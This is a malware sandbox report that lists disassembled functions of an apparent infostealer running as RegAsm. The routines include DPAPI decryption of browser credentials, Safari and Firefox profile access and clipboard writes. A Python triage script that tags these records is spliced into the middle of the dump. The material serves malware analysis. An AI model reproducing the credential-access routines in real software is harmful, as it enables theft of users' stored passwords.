                                                                        • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                        • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                        APIs
                                                                        • EmptyClipboard.USER32 ref: 004098EC
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                        • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                        • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                        • GetLastError.KERNEL32 ref: 0040995D
                                                                        • CloseHandle.KERNEL32(?), ref: 00409969
                                                                        • GetLastError.KERNEL32 ref: 00409974
                                                                        • CloseClipboard.USER32 ref: 0040997D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                        • String ID:
                                                                        • API String ID: 2565263379-0
                                                                        • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                        • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                        • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                        • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                        APIs
                                                                        • EmptyClipboard.USER32 ref: 00409882
                                                                        • wcslen.MSVCRT ref: 0040988F
                                                                        • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                        • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                        • memcpy.MSVCRT ref: 004098B5
                                                                        • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                        • CloseClipboard.USER32 ref: 004098D7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                        • String ID:
                                                                        • API String ID: 2014503067-0
                                                                        • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                        • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                        • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                        • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                        APIs
                                                                        • GetLastError.KERNEL32 ref: 004182D7
                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                        • LocalFree.KERNEL32(?), ref: 00418342
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                          • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                          • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                        • String ID: OsError 0x%x (%u)
                                                                        • API String ID: 403622227-2664311388
                                                                        • Opcode ID: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                        • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                        • Opcode Fuzzy Hash: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                        • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Version
                                                                        • String ID:
                                                                        • API String ID: 1889659487-0
                                                                        • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                        • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                        • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                        • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                        APIs
                                                                        • _wcsicmp.MSVCRT ref: 004022A6
                                                                        • _wcsicmp.MSVCRT ref: 004022D7
                                                                        • _wcsicmp.MSVCRT ref: 00402305
                                                                        • _wcsicmp.MSVCRT ref: 00402333
                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                        • memset.MSVCRT ref: 0040265F
                                                                        • memcpy.MSVCRT ref: 0040269B
                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                        • memcpy.MSVCRT ref: 004026FF
                                                                        • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                        • API String ID: 2257402768-1134094380
                                                                        • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                        • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                        • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                        • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
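The two function records above, the clipboard routine at 004098EC-0040997D and the CryptUnprotectData caller at 004022A6-00402775, are the kind of output an analyst has to triage by the hundred in a function dump of this size. The script below is an added example and is not part of the Joe Sandbox report or of the Remcos sample: it parses records in this "APIs / Strings / Similarity" layout into structured calls and fields and tags each record with simple behavioural indicators. The indicator names, the CF_UNICODETEXT/GENERIC_READ argument checks and the CREDENTIAL_STORE_MARKERS list are this example's own heuristics, and SAMPLE is constructed from the two records shown above.

```python
# Added example, not part of the report: parse the "APIs / Strings / Similarity" function records
# that Joe Sandbox emits and tag each with triage indicators. The indicator rules are this
# example's own heuristics; SAMPLE is constructed from two function records shown in this report.
from __future__ import annotations
import re
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR", "• Name.MODULE ref: ADDR", or the indented
# "• Part of subcall function PARENT: Name.MODULE(args), ref: ADDR" form.
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?(?P<name>[\w?@$]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<addr>[0-9A-Fa-f]{8})$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")  # "API ID: ...", "String ID: ..."
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class Call:
    name: str
    module: str
    args: tuple[str, ...]
    addr: str
    parent: str | None  # parent function address for "Part of subcall" lines, None for direct calls

@dataclass
class FunctionRecord:
    calls: list[Call] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

    def named(self, api: str) -> list[Call]:
        return [c for c in self.calls if c.name == api]

def parse_report(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    current = section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:  # every "APIs" header opens a new function record
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
        elif not line or current is None:
            continue
        elif section == "APIs" and (m := CALL_RE.match(line)):
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            current.calls.append(Call(m["name"], m["module"], args, m["addr"], m["parent"]))
        elif section not in ("APIs", "Strings") and (m := FIELD_RE.match(line)):
            current.fields[m["key"]] = m["value"]  # "Strings" entries are skipped here
    return records

CF_UNICODETEXT, GENERIC_READ = "0000000D", "80000000"  # clipboard format 13; CreateFileW read access
# Constants that sit next to CryptUnprotectData in this report's record; a heuristic, not a signature.
CREDENTIAL_STORE_MARKERS = ("com.apple.Safari", "com.apple.WebKit2WebProcess", "Account", "server")

def indicators(rec: FunctionRecord) -> list[str]:
    """Tags derived only from API names, printed argument constants and the String ID field."""
    tags = []
    if any(CF_UNICODETEXT in c.args for c in rec.named("SetClipboardData")):
        tags.append("clipboard-write")
    if any(GENERIC_READ in c.args for c in rec.named("CreateFileW")) and rec.named("ReadFile"):
        tags.append("file-read")
    if rec.named("CryptUnprotectData"):
        tags.append("dpapi-decrypt")
    if any(mk in rec.fields.get("String ID", "") for mk in CREDENTIAL_STORE_MARKERS):
        tags.append("credential-store-strings")
    return tags

# Constructed sample: the two function records shown in this report, in Joe Sandbox's layout.
SAMPLE = r"""
APIs
• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalFix.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnWire.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• GetLastError.KERNEL32 ref: 0040995D
• CloseHandle.KERNEL32(?), ref: 00409969
• GetLastError.KERNEL32 ref: 00409974
• CloseClipboard.USER32 ref: 0040997D
APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT ref: 0040269B
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
• memcpy.MSVCRT ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Strings
Similarity
• API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 2257402768-1134094380
"""
```

Run `parse_report` over a saved copy of the Functions section and call `indicators` on each record: records tagged dpapi-decrypt together with credential-store-strings, or clipboard-write next to file-read, are the ones worth opening in the disassembler first. Everything under Similarity (API ID, String ID, the Opcode and Instruction fuzzy hashes) lands in `fields`, so the same records can be keyed by fuzzy hash when comparing this dump against another analysis.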
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                        • String ID: :stringdata$ftp://$http://$https://
                                                                        • API String ID: 2787044678-1921111777
                                                                        • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                        • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                        • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                        • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                        • GetWindowRect.USER32(?,?), ref: 00414088
                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                        • GetDC.USER32 ref: 004140E3
                                                                        • wcslen.MSVCRT ref: 00414123
                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                        • ReleaseDC.USER32(?,?), ref: 00414181
                                                                        • _snwprintf.MSVCRT ref: 00414244
                                                                        • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                        • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                        • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                        • GetClientRect.USER32(?,?), ref: 004142E1
                                                                        • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                        • GetClientRect.USER32(?,?), ref: 0041433B
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                        • String ID: %s:$EDIT$STATIC
                                                                        • API String ID: 2080319088-3046471546
                                                                        • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                        • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                        • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                        • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00413221
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                        • memset.MSVCRT ref: 00413292
                                                                        • memset.MSVCRT ref: 004132B4
                                                                        • memset.MSVCRT ref: 004132CD
                                                                        • memset.MSVCRT ref: 004132E1
                                                                        • memset.MSVCRT ref: 004132FB
                                                                        • memset.MSVCRT ref: 00413310
                                                                        • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                        • memset.MSVCRT ref: 004133C0
                                                                        • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                        • memcpy.MSVCRT ref: 004133FC
                                                                        • wcscpy.MSVCRT ref: 0041341F
                                                                        • _snwprintf.MSVCRT ref: 0041348E
                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                        • SetFocus.USER32(00000000), ref: 004134B7
                                                                        Strings
                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                        • {Unknown}, xrefs: 004132A6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                        • API String ID: 4111938811-1819279800
                                                                        • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                        • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                        • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                        • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                        • SetCursor.USER32(00000000), ref: 0040129E
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                        • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                        • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                        • EndDialog.USER32(?,?), ref: 0040135E
                                                                        • DeleteObject.GDI32(?), ref: 0040136A
                                                                        • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                        • ShowWindow.USER32(00000000), ref: 00401398
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                        • ShowWindow.USER32(00000000), ref: 004013A7
                                                                        • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                        • String ID:
                                                                        • API String ID: 829165378-0
                                                                        • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                        • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                        • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                        • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00404172
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        • wcscpy.MSVCRT ref: 004041D6
                                                                        • wcscpy.MSVCRT ref: 004041E7
                                                                        • memset.MSVCRT ref: 00404200
                                                                        • memset.MSVCRT ref: 00404215
                                                                        • _snwprintf.MSVCRT ref: 0040422F
                                                                        • wcscpy.MSVCRT ref: 00404242
                                                                        • memset.MSVCRT ref: 0040426E
                                                                        • memset.MSVCRT ref: 004042CD
                                                                        • memset.MSVCRT ref: 004042E2
                                                                        • _snwprintf.MSVCRT ref: 004042FE
                                                                        • wcscpy.MSVCRT ref: 00404311
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                        • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                        • API String ID: 2454223109-1580313836
                                                                        • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                        • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                        • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                        • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                        APIs
                                                                          • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                        • SetMenu.USER32(?,00000000), ref: 00411453
                                                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                        • memcpy.MSVCRT ref: 004115C8
                                                                        • ShowWindow.USER32(?,?), ref: 004115FE
                                                                        • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                        • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                          • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                          • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                        • API String ID: 4054529287-3175352466
                                                                        • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                        • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                        • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                        • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                        • API String ID: 2000436516-3842416460
                                                                        • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                        • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                        • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                        • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                        APIs
                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                          • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                          • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
